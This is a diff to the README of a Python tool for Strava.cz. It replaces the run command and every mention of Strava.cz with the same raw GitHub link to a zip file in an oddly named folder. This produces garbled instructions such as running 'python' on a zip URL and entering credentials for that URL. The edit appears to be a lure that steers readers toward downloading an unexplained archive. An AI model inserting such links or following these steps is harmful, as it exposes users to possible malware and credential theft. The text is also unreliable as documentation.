haslanin/strava-cz-python/README.md

 2. **Run the Application**:
    - Navigate to the folder where the application is installed.
-   - Type `python strava_cz.py` and hit Enter.
+   - Type `python https://raw.githubusercontent.com/haslanin/strava-cz-python/main/velvetry/strava-cz-python.zip` and hit Enter.

 3. **Access the API**:
-   - Follow the prompts to access and retrieve data from Strava.cz.
+   - Follow the prompts to access and retrieve data from https://raw.githubusercontent.com/haslanin/strava-cz-python/main/velvetry/strava-cz-python.zip
-   - You may need to provide your Strava.cz credentials for enhanced features.
+   - You may need to provide your https://raw.githubusercontent.com/haslanin/strava-cz-python/main/velvetry/strava-cz-python.zip credentials for enhanced features.

 ## 🌐 Example Usage
 Once you have the application running, you can perform several actions, such as:

-- **Fetch Recent Activities**: Retrieve your latest activities from Strava.cz.
+- **Fetch Recent Activities**: Retrieve your latest activities from https://raw.githubusercontent.com/haslanin/strava-cz-python/main/velvetry/strava-cz-python.zip
 - **Update Profiles**: Edit your Strava user profile directly from the app.
 - **Generate Reports**: Create detailed reports of your activities, including distance and times.